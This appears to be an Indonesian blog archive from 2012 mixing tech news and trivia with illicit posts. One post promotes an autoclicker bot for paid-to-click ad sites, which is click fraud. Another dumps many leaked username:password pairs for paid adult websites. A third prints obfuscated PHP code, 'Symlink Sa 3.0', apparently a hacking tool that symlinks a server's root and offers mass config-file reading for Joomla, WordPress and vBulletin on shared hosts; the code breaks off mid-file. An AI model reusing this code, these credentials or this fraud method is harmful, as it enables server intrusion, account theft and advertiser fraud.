Breaking News

Tuesday, October 23, 2012

Kaskus Resmi Tampilkan Wajah Baru




Situs komunitas online Kaskus resmi memasang tampilan barunya, Senin (22/10/2012). Kaskus hadir dengan desain halaman utama yang terlihat lebih simpel, tetapi tetap didominasi warna biru.

Di halaman utama, Kaskus memisahkan antara Forum dan Forum Jual Beli. Jumlah posting dan jumlah anggota yang dahulu selalu dipajang di halaman utama saat ini ditiadakan.

Masuk ke halaman Forum, Anda langsung dihadapkan dengan judul publikasi yang menjadi Hot Threads. Halaman Forum ini didesain memanjang sehingga pengguna harus menggulirkan layar ke bawah jika hendak melihat seluruh daftar Forum, Regional, dan Kaskus Corner.

Ada cara cepat untuk masuk ke Forum, Regional, ataupun Kaskus Corner, tanpa harus menggulirkan layar. Anda cukup mengklik tombol All Categories di kanan atas.

Sementara itu, ketika mendarat di halaman Forum Jual Beli (FJB), Anda dihadapkan pada sederet ulasan gadget terkini. Kaskus belum meluncurkan Marketplace sebagai tempat jual beli yang transaksinya kelak menggunakan KasPay.

Tampilan baru ini mengalami beberapa kali perombakan, dan digarap dalam waktu sekitar satu setengah tahun. Kaskus bahkan merombak ulang rencana desain tampilan pada awal 2012.
Read more ...

Monday, October 22, 2012

PTC + Multiclicker

Taukah anda PTC ? singkatnya PTC (Paid To Click) yaitu kalian meng-klik iklan dan di bayar
tentu saja banyak web PTC di internet tapi banyak juga yang main kabur atau scam a.k.a semua kerja kalian yang lakukan menjadi sia2 a.k.a ga dapat uang
padahal udah kerja susah payah siang malam mengklik iklan sampai lupa mandi dan belum make-up
disini saya akan berkata "kenapa perlu melakukan cara susah kalau ada cara yang mudah"
di dunia PTC sana adalah dunia yang keras, banyak penipuan dan banyak darah dimana2 (sepertinya yang ini tidak termasuk) makanya saya disini hadir atas apa yang saya temukan

kenapa bisa automatis ? di bagian ini gw share tentang Multiclicker2
pembahasan sedikit tentang Multiclicker2, multiclicker 2 adalah penerus dari autoclicker yang paling terkenal yang dapat membuat kalian mendapat uang dengan sangat saangat..... mudah dan satunya2nya yang support penambahan site (plugin)

benefit a.k.a keuntungan cara ini :
- FREE!! ga pake biaya pendaftaran
- tidak boros waktu lagi meng-klik ads yang ada di web PTC (because time is money dude!)
- tangan anda tidak pegal mengklik2 ads
- uang akan mengalir dengan 1x klik (biarpun anda sedang mandi dll)
- jika memang benar web PTC itu Scam, anda tidak rugi karena tidak bekerja keras


"Work Smarter not Harder"


Okay kita mulai dari sini gimana caranya :

1. pastikan sudah mendaftar di Web-web PTC bisa dilihat di BAWAH beserta pluginnya sudah di download
2. download Multiclickers2 -> DOWNLOAD
3. kumpulkan semua pluginsnya, pindahkan ke folder Multiclickers ->lalu paste di folder "site"
4. Jalankan Multiclickers
5. Click "file" -> load site lalu pilih .site yang ingin di masukkan
6. Click "Add", pilih website untuk dimasukkan ke list
7. Isikan login formnya Sesuai dengan website yang di daftar
8. ok+start

Listnya web PTC beserta Plugin di bawah:



Register >> http://www.00bux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?r411svv9ngmlrqb



Register >> http://www.buxsecure.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?og19cuuca9gybzv



Register >> http://www.imperialgetcash.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?lcv69qmb326yada



Register >> http://www.infinitybux.com/?ref=ariiv45
Download Plugin >> http://www.mediafire.com/?6017u3bu6ezb9ua



Register >> http://www.buxbonanza.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?f74m58sxyn4qbyw



Register >> http://www.keybux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?whhamlzi8h8vz7f



Register >> http://www.levelupptc.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?5wfq2rxsqr4kott



Register >> http://www.phd-clix.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?itxdm3arbtd8800



Register >> http://www.premiobux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?wci53cnrhdeo360



Register >> http://www.ricabux.com/?ref=ariiv00
Download Plugin >> http://www.mediafire.com/?9v8x3kbcjw2ewi1



Register >> http://www.ticbux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?d7vwrh9r05dqik1



Register >> http://www.bigfuturebux.com/?ref=ariiv00
Download Plugin >> http://www.mediafire.com/?g4sbkrief7xgq65



Register >> http://www.ref4bux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?p74bqij3pf3qk8t



Register >> http://www.scarlet-clicks.info/index.php?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?uf4ptwtr14wc2d8



Register >> http://www.yahoobux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?doobbw4nygb1l3g




Register >> http://www.novakbux.com/?ref=ariiv99
Download Plugin >> http://www.mediafire.com/?56kr6ypx50uugkk
Read more ...

Sunday, October 7, 2012

7 Mata Uang Dengan Sejarah Unik

Uang diciptakan untuk mempermudah manusia dalam melakukan perdaganagan yang digunakan sebagai alat pembayaran yang sah disuatu negara. Namun tahukah tahukah kamu uang diciptakan tidak luput dari sejarah yang menyertainya salah satunya adalah 7 mata uang berikut ini yang dibuat pada masanya yang sampai saat ini masih meninggalkan cerita unik. Mau tahu uang apa aja itu simak 7 Mata Uang Dengan Sejarah Unik berikut ini.


7. Uang kumpulan voucher (vietnam)

Jika kita pernah berpikir bahwa uang bisa membeli segalanya, ternyata tidak. Uang Vietnam di tahun 70an ini berlaku sebagai kumpulan potongan voucher yang hanya bisa digunakan untuk membeli pakaian dan perlengkapannya.

Mungkin jika kita harus memotong salah satu bagian untuk membayar baju, sebagian lagi untuk membayar celana, dan sebagian lagi untuk ikat pinggang.


6. Mata Uang berbentuk komoditas

Garam adalah salah satu barang tertua yang digunakan sebagai pembayaran. Sebenarnya, kata “salary” (gaji) berasal dari bahasa Latin “salarium” yaitu uang yang telah dibayarkan kepada prajurit Roma untuk membeli garam.

Garam juga juga digunakan sebagai alat tukar (mata uang) utama di gurun Sahara selama berabad-abad, dan digunakan secara luas di seluruh Afrika Timur. Biasanya, seseorang pada masa itu akan menjilati garam satu blok untuk memastikan garam tersebut asli dan memutuskan untuk membuat pecahan dari blok itu sebagai pecahan uang kecil.

Balok garam pada gambar berusia 1500 tahun.

Mata uang unik lainnya adalah :
* “RENG”, uang berbentuk bola benang yang dibungkus dalam sabut kelapa. Digunakan jama dulu di Kepuluan Solomon.
* Kakao digunakan di seluruh Meksiko dan Amerika Tengah
* Keju Parmigiano Reggiano , bahkan bisa digunakan sebagai jaminan pinjaman di Italia


5. Uang pecahan terbesar (Hungaria)

Inilah pecahan mata uang pemegang rekor sampai saat ini. Dicetak oleh Hungaria pada tahun 1946 dengan nominal 100,000,000,000,000,000,000 Pengo. Ya! Seratus juta triliun Pengo dengan kurs saat itu hanya sekitar 20 US cent. Lihat saja, sampai jumlah nolnya pun tidak mungkin tercetak di sana.


4. Modifikasi Uang Karena Kudeta (Zaire)

Saat rezim Joseph Mobutu dikudeta pada tahun 1997 di Zaire (yang sekarang bernama The Democratic Republic of the Congo) Pemerintahan yang baru saat itu terlalu sibuk untuk mendesain dan mencetak uang baru selain karena jumlah uang saat itu terbatas pula.


3. Kulit tupai (Rusia)

Di beberapa abad silam, kulit tupai merupakan uang yang sah digunakan di Rusia. Bahkan beberapa bagian dari tupai mati ini seperti kuping, hidung, dan kuku-kukunya berfungsi sebagai “receh”. Kemungkinan Rusia saat itu bisa terbebas dari penyakit-penyakit yang ditularkan satwa.


2. Koin perak plus bonus air suci (Kep. Palau)

Jika di uang kertas USD ada “In God We Trust”, negara kepulauan Palau selangkah lebih maju. Negara ini pada tahun 2007 mencetak koin perak dengan gambar perawan suci dan menyertakan bonus botol kecil berisi beberapa tetes air suci dari sebuah mata air suci di Lourdes Perancis.

Negara ini pernah pula menyertakan mutiara, bahkan batu meteor pada uang koinnya. Perak dan air suci, hmm apakah negara ini ada masalah dengan serangan vampire dan werewolf ?


1. Uang dari batu (Pulau Yap, Kep. Solomon)

Di pulau Yap, sebuah pulau di Kepulauan Solomon, Anda akan menemukan “uang” terbesar dan teraneh di dunia : batu rai (semacam batu kapur). Uang ini berbentuk lingkarang dengan diameter 12 kaki dan berat 8 ton.

Entah sejarah atau kepercayaan apa yang menyebabkan masyarakat di Pulau Yap ini sangat mensakralkan batu ini, mungkin sama seperti masyarakan modern sangat mengagungkan batu emas.

Karena jenis batu ini tidak bisa ditemui di Pulau Yap, masyarakat Pulau Yap rela mengorbankan nyawa mereka untuk berpetualang mencari batu ini.

Tahukah kamu? Nilai nominal dari batu ini dinilai bukan hanya berdasarkan ukuran, tapi juga dinilai berdasarkan pengorbanan mendatangkannya ke Pulau Yap, termasuk jumlah nyawa yang melayang karena pengorbanan tersebut.

Karena bentuknya besar, uang ini dibiarkan tergeletak di luar rumah pemiliknya, bahkan kadang di hutan. Meski tergeletak di mana saja, orang2 pasti mengetahui siapa pemiliknya saat ini. Apabila terjadi pergantian kepemilikan, akan dilakukan dalam upacara tertentu.

Tentu saja itu jaman dulu. Pemerintah setempat telah melarang batu-batu uang ini keluar dari Pulau. Tapi setidaknya kamu bisa jumpai uang antik ini di lobi Bank of Canada di Ottawa andri cinta ucok
Read more ...

Premium Accounts 7.10.2012

http://amatricedebutante.com
syderia:gaelupin
Brazilio:mylaine
Tomaro16:bech1960


http://joliestarr.com/
splicer1:ryan74
KYUSHU:ORIOAUG
larye2nd:friday
jpmjpm:jpm1125


http://www.allnetworkpass.com
drgrobo:august
eggu5yknvmupu:goodhi
frode1:frode17a


http://www.brazzers.com
orange42:reaper2
pmould:plm151145
mattlo:ploppy
mirodell:od111161
ripper87:x31efmd


http://kscans.com
aNh8Aw:WrioLv
afEXrL:hMmGDz
AD4BjS:qRTfFB


http://amateurcanada.com
5mwtiu4f:scxmqrqs
mwmz5rim:73dpm58e
qkaswkjh:uzncd27i


http://sweetmembers.com
julianphil:3highstr
westy55663:8861luff
epoch11:epoch12
fabz62:fabz6262


http://toyman:mistylou@www.maxinex.com/members/index.html
http://rkshark:blocked@www.maxinex.com/members/index.html
http://psayre23:racer222@www.maxinex.com/members/index.html
http://atuin30:keats30@www.maxinex.com/members/index.html
http://ultralig:24hendri@www.maxinex.com/members/index.html


http://gentleman600:sooty160@www.featuredcontent.com/members/
http://gold3509:456123@www.featuredcontent.com/members/
http://gibb1900:peavine@www.featuredcontent.com/members/
http://ggarrity:columbia@www.featuredcontent.com/members/
http://gregmorr:morrisg@www.featuredcontent.com/member


http://hoefges:wickedpeter@members.jessicadrake.com/
http://epochasp:a9z2e8f4gs8e@members.jessicadrake.com/
http://current:documentary@members.jessicadrake.com/
http://rrodri39:biomedica@members.jessicadrake.com/
http://xxxscarlets:scarletsxxx@members.jessicadrake.com/
http://LAdirect:LAdirect2009@members.jessicadrake.com/


http://www.myteenmaid.com/members/english/
nicpaycom:nictest2
rdQDw7Iy:JgGLmzOrSAx42urm
maximim:gibson
eatmenow:02587410
vlPCDIT9:xMPIrauIEzj8tTqe


http://maximim:gibson@www.myteenmaid.com/members/
http://nicpaycom:nictest2@www.myteenmaid.com/members/
http://werwer:sdfsdf@www.myteenmaid.com/members/


http://nationalpornography.xxx/
blink311fan:Vikings9
degasl:zaq123ed
be#rman:evergree
z053855:z0538556


http://bustyclassics.com/
tazuyan:81002912
tennisbum1:112445
7bigkahuna8:6poiboy6
jimbob77:emmabin






http://annabelleflowers.com
IHatetu:cotton
odhinnfo:93rjRk39
sarge7:ammonco


http://pornstar.com
alphabetaz1:miloabc1
anylen01:rogere02
antoniodimat:enero1951
arthco72:boaztemplar
andre6612:hf010797


http://sweetmembers.com/
dla421:LF4QJPC7
gizmo559:BRWFECE8
randy12345:XB7KGMNE


http://creampimps.com
mtndoc91:mtneer91
redsec123:Charly09
vicman123:ez1rah
RoyleP:barney


http://cuckolds.com
fun391:fart924
whack384:hot9234
free098:7muvipa
doggy293:food119
back69:shitshit
but8484:hoe2719


http://filipinosextour.com
mosima:funfun


http://burningangel.com/
danjj52:althor3
mongerlkoi:Swampsong
nonputty:monkey


http://ultimateuniforms.com
efixer69:tigger69
graciella:bigass01
bonky:paris
tomgill:robbie
cowboys:saints
krz901:susan69
cesspp22:carla123
tonymr:tm3636
jimboy5:school
lind1958:dave1958


http://bikinidream.com/
lsquirts:4a3pgewn
wm_mojo:N29plEBu
ethanm5:qw83j2ij
zaarmax:m9u84mnu
wm_104685:3K4767QU


http://mysexynurses.com
imonfire:firefire


http://teenieaccess.com
jomich:379cat
http://plus.playboy.com
desmetf:6883flde
din100:a19l1980
dadeejay:blackberry
dhsea1256:al357ton
fanman59:vicky420
haraldhein:geheim
fast2208:runner217
gagikjan:mkhitaryan
costad:cockstar
adam79112@hotmail.com:K4ZYPwJe


belsebob:slasher
agresnep:grainger


http://ipad.realitykings.com/member/scenes/
Branman80:peachs80
Bogert23:Fuckface
bnaughty:inawty


http://fukks.com/login.php
millions:billions
mazdamx5:miatamx5


http://babisyn.com/
detritus:buttocks
Ron:Ronnie19


http://livestrip.com
schaggi:Luzi2005
eojzcub:p2pkms3
kdogg3369:hvymtl


http://nakedcloset.com/members/
martyyyy:phenmarr
mark247:red4rum4
mickey35:7786pick
mbeef810:letmein
mirodell:od111161
michmarg:type42
mistyp:lafrloutch
mojo1704:jomo1704
mrxqsess:buster53
medic68w:mixers


http://babelicious.com
ChXftXVu2:YhXPYyrW
cmtaylor:198399
n7EZCTrSG:6QgGMENL
ajhetjYaXY:6bbNeCq5
nGjUrUhXnZ:neNrccFf9
WbTZDe7U7:HMPQHyAk
CuExmjZ8:DWLbxY2PK


http://nextdoor-models.com
jlucas:venice
Frohnau2:20002000
mjones1024:seattle2
kmike77:redsox
69fjdc:123456
bennyboy:steelers
borstadxx:pmb123
skiupstud:planet3
bobjohn333:1qwert


http://ultimatefantasygirls.com
cutler:cj3000
donnie1076:coffee
Hoopdawg:cooper


http://www.vivthomas.com
jimroger:shon2hok
florschu:sroz5kid
fkan99:holland
falcode:falcode8
jimmypat1:Eagle123


http://ema3gp6yf91:villa2@www.ultradvdpass.com/members/
http://falconjackie:899112@www.ultradvdpass.com/members/
http://kannabis:delagghetto@www.ultradvdpass.com/members/


http://pompom34:ponpon33@www.bikini-heat.com/area51/
http://Mmacdza:nottoday@www.bikini-heat.com/area51/
http://georgect:cooper@www.bikini-heat.com/area51/


http://www.amateurcanada.com/members/
caetorus86:fuckyeah






http://www.regalmodels.com/
Morely6:j1affa


http://members.hushpass.com/
amfar48:romanee5


http://skulle:101687@members.publicinvasion.com/
http://sway83:nevets@members.publicinvasion.com/
http://jmbill:crystal@members.publicinvasion.com/
http://hunter34:gracie@members.publicinvasion.com/


http://epochasp:a9z2e8f4gs8e@members.jessicadrake.com/
http://current:documentary@members.jessicadrake.com/
http://rrodri39:biomedica@members.jessicadrake.com/
http://xxxscarlets:scarletsxxx@members.jessicadrake.com/


http://silvado:nipple@in.lifetimeanalpass.com/ltanalpass-members/index.php
http://gabitt:245508@in.lifetimeanalpass.com/ltanalpass-members/index.php
http://katsjoe:arbiter@in.lifetimeanalpass.com/ltanalpass-members/index.php
http://muragn1:19731981@in.lifetimeanalpass.com/ltanalpass-members/index.php


http://casting.xxx/members/
Achilles:159753
amsterdam:rotterda
angelesbuddy:baa1010
alemanha:germany
arminyou26:pinpon26


http://members.allasianaccess.com/trikepatrol/
mgorgo:elephant
jmerchak:zuzujm
camfazli:password


http://gfrevenge.com
nicpaycom:nictest2
fatboy:arsenal
olymprun1:ravens1
costina:verdino
takara:roberts
Rigga9966:Usma2004
homstar:spitfire
UiMaine:fuckoff
jimmy1:jimmy2
bermy1:cutass
sledger9:933084


http://Platinumclub.com
poiuy:poiuytrew


http://members.easyteensluts.com/
aldavisisgod:timbrown
am3ric4nb34uty:msgrl4ever
allshiper:spweq34
angel27:oasis35
antoinebar:msnet01
ArsenXXX:Redhat12
alothe:7heprypt


http://joymii.com
fast2208:runner217
ferien:reisen
dhsea1256:al357ton
elise25:millwood
gguyer:geo1755
kmmtas:zeftyzeft
lachatte:cyprine
jnewman:jnewman6
johngalt:hoosiers
altopelirrojo:donquijote
allendg:abc123
aaaandret23:ttttanne


http://victoriasummers.com
cinghial:leopardo
jescott:central
lifetime:pumpkin
Luggi01:Corratec
magpie:nufc1892
mja345:rewind
monkee:graham1
nabors20:desoto20
pander:135790
polerd:1957kk




http://warmkiss.com
massim:massix


http://myprivateglamour.com/
1Paolo:1Minter
099naf:990fan


http://fukks.com
calicoast:cg93452177


http://ten.com/
birdhouse:roker
bobbyc35:sheffiel
befucked:q1234
cdr70066:maxello6


http://18andabused.com
scotty55:637647


http://eurofoxes.com
belezapura:alegria
ulises2001:178900
hager88:tami88
nadstazik:mexxogen
wizard571:Br1ckR0ad


http://assmeat.com/signin
amirmass:maryam


http://allelitepass.com
corwin3322;shiner11
llomens;apmd00
sherodh;297ram
driver721;272727
gachandr;horizon


http://littlemutt.com/
EjCMKW:Vw5sDk
pVHjJt:x9QzPA
hailey2:4dhy78






http://allcelebpass.com
mwoodruff:drillsgt
suseel:magnet12
kare9000:sand9000
TheCid:Elcid82
keremkur:musker8591


http://8teensworld.com
sirr0dn3y:reviewac
tbp_review:access_t
jackhead:69698992


http://nudegirls-in-public.com
hilitengp:ngp4096411


http://joymii.com/
ferien:reisen
DwayneOwen:cop103
enable:ganddal4
ggudinkas:porsche5
manne212:hoepfner
pnoguerab:penb8563
willm5:hamster5
barneya:149911


http://princessrio.com/
eddolls1:carpet10
festus22:valenz33
georgina:surreygi
jagman:lishia
jescott:central
mja345:rewind
petiteteenager:aimee121
puretotty:steve121
rlim4512:abcd1234
yorric:arden79


http://ultradvdpass.com
Tmjh123:rrb7995
DATATECH:MATRIX
lbpolo:polopolo
diseasicon:sillybum


http://Babes.com
garynow:history1
jkmoore38:modiddy13 -FA
gebivo:7pvh4wbh
wabungas:zertoux
Read more ...

Saturday, October 6, 2012

Symlink Sa 3.0



<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLO?BALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO00000?0{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};?><?php eval($GLOBALS['OOO0000O0']('JEdMT0JBTFNbJ0lJSUlJSUlsbGxsbCddPSdjb3B5JzskR0xPQkFMU1snSUlJSUlJSWxsbGxJJ109J2?hlYWRlcic7JEdMT0JBTFNbJ0lJSUlJSUlsbGxJMSddPSdpc19kaXInOyRHTE9CQUxTWydJSUlJSUlJbG?xsSUknXT0naW5pX2dldCc7JEdMT0JBTFNbJ0lJSUlJSUlsSTFsMSddPSdteXNxbF9xdWVyeSc7JEdMT0?JBTFNbJ0lJSUlJSUlsSTFsSSddPSdteXNxbF9jb25uZWN0JzskR0xPQkFMU1snSUlJSUlJSWxJbGwxJ1?09J2VyZWcnOyRHTE9CQUxTWydJSUlJSUlJbElJSTEnXT0nZmNsb3NlJzskR0xPQkFMU1snSUlJSUlJSW?xJSUlJJ109J3N0cmlwY3NsYXNoZXMnOyRHTE9CQUxTWydJSUlJSUlJSTExMUknXT0naGlnaGxpZ2h0X2?ZpbGUnOyRHTE9CQUxTWydJSUlJSUlJSTExbDEnXT0nc2hvd19zb3VyY2UnOyRHTE9CQUxTWydJSUlJSU?lJSTExbGwnXT0naHRtbGVudGl0aWVzJzskR0xPQkFMU1snSUlJSUlJSUkxMWxJJ109J2ZpbGVzaXplJz?skR0xPQkFMU1snSUlJSUlJSUkxMUkxJ109J2ZyZWFkJzskR0xPQkFMU1snSUlJSUlJSUkxbGxJJ109J3?ByZWdfbWF0Y2gnOyRHTE9CQUxTWydJSUlJSUlJSTFJMWwnXT0nc3RycG9zJzskR0xPQkFMU1snSUlJSU?lJSUlJMTFJJ109J2ZpbGVvd25lcic7JEdMT0JBTFNbJ0lJSUlJSUlJSTFsMSddPSdwb3NpeF9nZXRwd3?VpZCc7JEdMT0JBTFNbJ0lJSUlJSUlJSTFsSSddPSd0cmltJzskR0xPQkFMU1snSUlJSUlJSUlJMUlsJ1?09J3ByZWdfbWF0Y2hfYWxsJzskR0xPQkFMU1snSUlJSUlJSUlJMUlJJ109J2VyZWdpJzskR0xPQkFMU1?snSUlJSUlJSUlJbDExJ109J2ZsdXNoJzskR0xPQkFMU1snSUlJSUlJSUlJbDFJJ109J2ZpbGUnOyRHTE?9CQUxTWydJSUlJSUlJSUlsbGwnXT0naXNfZmlsZSc7JEdMT0JBTFNbJ0lJSUlJSUlJSWxsSSddPSdiYX?NlbmFtZSc7JEdMT0JBTFNbJ0lJSUlJSUlJSWxJbCddPSdzeW1saW5rJzskR0xPQkFMU1snSUlJSUlJSU?lJbElJJ109J2Z3cml0ZSc7JEdMT0JBTFNbJ0lJSUlJSUlJSUkxMSddPSdmb3Blbic7JEdMT0JBTFNbJ0?lJSUlJSUlJSUlsbCddPSdjb3VudCc7JEdMT0JBTFNbJ0lJSUlJSUlJSUlsSSddPSdleHBsb2RlJzskR0?xPQkFMU1snSUlJSUlJSUlJSUlJJ109J3NldF90aW1lX2xpbWl0Jzs=')); ?><?php 
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSUlJ')](0);
error_reporting(0);
$IIIIIIIIIIIl = $GLOBALS['OOO0000O0']('aHR0cDovLw==').$_SERVER[$GLOBALS['OOO0000O0']('U0VSVkVSX05BTUU=')].$_SERVER[$GLOBALS['OOO0000O0']('UkVRVUVTVF9VUkk=')];
$IIIIIIIIIII1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]($GLOBALS['OOO0000O0']('Lw=='),$IIIIIIIIIIIl );
$IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxs')]($IIIIIIIIIII1)-1],$GLOBALS['OOO0000O0'](''),$IIIIIIIIIIIl );
$IIIIIIIIIIl1 = $GLOBALS['OOO0000O0']('ZnRwOi8v').$_SERVER[$GLOBALS['OOO0000O0']('U0VSVkVSX05BTUU=')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sLw==').$_SERVER[$GLOBALS['OOO0000O0']('UkVRVUVTVF9VUkk=')];
$IIIIIIIIIII1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]($GLOBALS['OOO0000O0']('Lw=='),$IIIIIIIIIIl1 );
$IIIIIIIIIIl1 =str_replace($IIIIIIIIIII1[$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxs')]($IIIIIIIIIII1)-1],$GLOBALS['OOO0000O0'](''),$IIIIIIIIIIl1 );
;echo $GLOBALS['OOO0000O0']('ICA8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBTdHJpY3QvL0VOIg?0KICAgICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS1zdHJpY3QuZHRkIj4NCg?0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KDQo8aGVhZD4NCjx0aX?RsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4NCg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCg0KICBodG?1sLGJvZHkgew0KICAgICBtYXJnaW46IDA7DQogICAgIHBhZGRpbmc6IDA7DQogICAgIG91dGxpbmU6ID?A7DQp9DQphew0KDQogZm9udC1zaXplOiAxM3B4Ow0KDQp9DQoNCg0KYm9keSB7DQogICAgZGlyZWN0aW?9uOiBsdHI7DQogICAgYmFja2dyb3VuZC1jb2xvcjojRjRGNEY0Ow0KCWNvbG9yOiByZ2IoMTUzLCAxNT?MsIDE1Myk7DQogICAgdGV4dC1hbGlnbjogY2VudGVyDQp9DQoNCg0KDQppbnB1dCx0ZXh0YXJlYSxzZW?xlY3R7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjMDAwMDAwOw0KfQ0KDQppbnB1dCx0ZXh0YX?JlYSxzZWxlY3Q6aG92ZXJ7DQpib3gtc2hhZG93OiAwcHggMHB4IDRweCAjQUFBQUFBOw0KfQ0KDQoNCi?5oZWRyIHsNCiAgZm9udC1mYW1pbHk6IFRhaG9tYSwgQXJpYWwsIHNhbnMtc2VyaWYgIDsNCiAgZm9udC?1zaXplOiAyMnB4Ow0KDQoNCn0NCg0KLmNvbnQgYXsNCg0KIHRleHQtZGVjb3JhdGlvbjogbm9uZTsNCi?Bjb2xvcjpyZ2IoMTUzLCAxNTMsIDE1Myk7DQogZm9udC1mYW1pbHk6IFRhaG9tYSwgQXJpYWwsIHNhbn?Mtc2VyaWYgIDsNCiBmb250LXNpemU6IDE2cHg7DQogdGV4dC1zaGFkb3c6IDBweCAwcHggM3B4IDsNCn?0NCg0KLmNvbnQgYTpob3ZlcnsNCg0KDQogIGNvbG9yOiAjRUVFRUVFIDsNCiAgdGV4dC1zaGFkb3c6MH?B4IDBweCAzcHggIzAwMDAwMCA7DQoNCg0KfQ0KDQoudG1wIHRyIHRkew0KDQpib3JkZXI6IHNvbGlkID?FweCAjQkJCQkJCOw0KDQpwYWRkaW5nOiAycHggOw0KICBmb250LXNpemU6IDEzcHg7DQp9DQoNCi50bX?AgdHIgdGQgYSB7DQogIHRleHQtZGVjb3JhdGlvbjogbm9uZTsNCg0KDQoNCn0NCg0KLmZvdGVyew0KIC?Bmb250LXNpemU6IDlwdDsNCiAgY29sb3I6ICNBQUFBQUEgOw0KICB0ZXh0LWFsaWduOiBjZW50ZXINCn?0NCg0KLnRtcCB0ciB0ZDpob3ZlcnsNCg0KYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzg4ODg4ODsNCg?0KfQ0KLmZvdHsNCg0KZm9udC1mYW1pbHk6VGFob21hLCBBcmlhbCwgc2Fucy1zZXJpZjsNCg0KICBmb2?50LXNpemU6IDExcHQ7DQp9DQouZm9yIGEgOiBob3ZlcnsNCg0KdGV4dC1zaGFkb3c6IDBweCAwcHggMX?B4ICMzMzY2RkY7DQoNCn0NCg0KDQouaXIgew0KICBjb2xvcjogI0ZGMDAwMDsNCn0NCg0KDQoNCjwvc3?R5bGU+DQoNCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxkaXYgY2xhc3M9J2FsbCc+DQoNCg0K');
@mkdir($GLOBALS['OOO0000O0']('c3lt'),0777);
$IIIIIIIIII1I  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$IIIIIIIIII1l =@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')] ($GLOBALS['OOO0000O0']('c3ltLy5odGFjY2Vzcw=='),$GLOBALS['OOO0000O0']('dw=='));
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l ,$IIIIIIIIII1I);
@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbEls')]($GLOBALS['OOO0000O0']('Lw=='),$GLOBALS['OOO0000O0']('c3ltL3Jvb3Q='));
$IIIIIIIIIlI1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbGxJ')](__FILE__);
echo $GLOBALS['OOO0000O0']('PGJyIC8+PGRpdiBjbGFzcz0iaGVkciI+IFN5bWxpbmsgU2EgMy4wIDxiciAvPjwvZGl2Pg==') ;
echo $GLOBALS['OOO0000O0']('PGJyIC8+PGRpdiBjbGFzcz0iaGVkciI+LTpbIFVzZXIgJiBEb21haW5zICYgU3ltbGluayBdOi08Yn?IgLz48YnIgLz48L2Rpdj4=') ;
echo $GLOBALS['OOO0000O0']('PGRpdiBjbGFzcz0iY29udCI+DQoNCls8YSBocmVmPSI/Ij4gSG9tZSA8L2E+XQ0KDQpbPGEgaHJlZj0iP3N3cz1zeW0iPiBVc2VyICYgRG9tYWlucyAmIFN5bWxp?bmsgPC9hPl0NCg0KWzxhIGhyZWY9Ij9zd3M9c2VjIj4gRG9tYWlucyAmIFNjcmlwdCA8L2E+XQ0KDQpb?IDxhIGhyZWY9Ij9zd3M9ZmlsZSI+IFN5bWxpbmsgRmlsZSA8L2E+XQ0KDQpbPGEgaHJlZj0iP3N3cz1w?YXNzd2QiPiBTeW1saW5rIEJ5cGFzcyA8L2E+XQ0KDQo8YnIgLz48YnIgLz4NCg0KWyA8YSBocmVmPSI/c3dzPXJlYWQiPiBCeXBhc3MgUmVhZCA8L2E+XQ0KDQpbIDxhIGhyZWY9Ij9zd3M9am9vbWxhIj4gTWFz?cyBKb29tbGEgPC9hPl0NCg0KWyA8YSBocmVmPSI/c3dzPXdwIj4gTWFzcyBXb3JkUHJlc3MgPC9hPl0NCg0KWyA8YSBocmVmPSI/c3dzPXZiIj4gTWFzcyB2QnVsbGV0aW4gPC9hPl0NCg0KWyA8YSBocmVmPSI/c3dzPWhlbHAiPiBIZWxwIDwvYT5dDQoNCjxiciAvPjxiciAvPjxiciAvPg0KDQoNCg0KDQoNCg0KPC9k?aXY+');
if(isset($_REQUEST[$GLOBALS['OOO0000O0']('c3dz')]))
{
switch ($_REQUEST[$GLOBALS['OOO0000O0']('c3dz')])
{
case $GLOBALS['OOO0000O0']('c2Vj'):
if(!@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbGxs')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'))){
